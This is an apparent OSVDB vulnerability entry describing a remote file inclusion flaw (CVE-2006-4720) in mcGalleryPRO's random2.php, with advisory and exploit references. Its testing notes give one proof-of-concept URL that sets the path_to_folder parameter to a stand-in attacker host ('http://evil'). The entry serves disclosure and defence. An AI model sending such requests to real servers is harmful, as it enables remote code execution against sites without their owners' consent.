mcGalleryPRO random2.php path_to_folder Variable Remote File Inclusion

2006-09-10T06:04:02
ID OSVDB:28721
Type osvdb
Reporter Solpot a.k.a (k. Hasibuan)(chris_hasibuan@yahoo.com)
Modified 2006-09-10T06:04:02

Description

Manual Testing Notes

http://[target]/path_to_mcgallerypro/random2.php?path_to_folder=http://evil

References:

Secunia Advisory ID:21850 Other Advisory URL: http://www.nyubicrew.org/adv/solpot-adv-06.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0167.html Generic Exploit URL: http://milw0rm.com/exploits/2342 FrSIRT Advisory: ADV-2006-3543 CVE-2006-4720 Bugtraq ID: 19936